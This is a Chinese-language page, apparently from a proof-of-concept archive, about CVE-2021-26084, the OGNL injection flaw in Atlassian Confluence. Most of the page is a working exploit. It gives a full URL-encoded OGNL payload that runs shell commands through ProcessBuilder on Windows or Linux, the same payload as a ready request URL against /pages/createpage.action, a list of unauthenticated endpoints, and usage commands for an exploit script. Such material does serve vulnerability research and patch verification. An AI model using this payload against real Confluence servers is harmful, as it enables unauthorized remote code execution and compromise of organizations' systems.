关联漏洞
标题:
Atlassian Confluence Server 注入漏洞
(CVE-2021-26084)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server and Data Center 存在注入漏洞,经过身份验证的用户在Confluence 服务器或数据中心实例上执行任意代码。以下产品及版本收到影响:All 4.x.x versions、All 5.x.x versions、All 6.0.x versions、All 6.1.x ver
描述
CVE-2021-26084,Atlassian Confluence OGNL注入漏洞
介绍
# CVE-2021-26084
CVE-2021-26084,Atlassian Confluence OGNL注入漏洞
Atlassian Confluence 是企业广泛使用的维基系统,其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞,不需要任何用户的情况下在目标Confluence 中执行任意代码。
queryString参数执行任意命令
------
```
queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
```
/pages/createpage.action
这个接口需要一个可以创建页面的用户权限:
/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
```
http://your-ip:8090/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
```
/pages/createpage-entervariables.action
/pages/doenterpagevariables.action
不需要登录,用POST请求
脚本测试:
------
命令:
```
python3 -r test.txt
```
脚本利用:
------
命令:
```
python3 -u http://example.com
```
参考:
-------
https://github.com/vulhub/vulhub/blob/master/confluence/
https://github.com/h3v0x/CVE-2021-26084_Confluence
https://www.cnblogs.com/huangxiaosan/p/14290034.html
https://blog.csdn.net/weixin_43072923/article/details/117083611
文件快照
[4.0K] /data/pocs/a6fa275b61da73f296e24b51255c65766de5e180
├── [5.3K] CVE-2021-26084_Confluence_OGNLInjection.py
└── [3.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。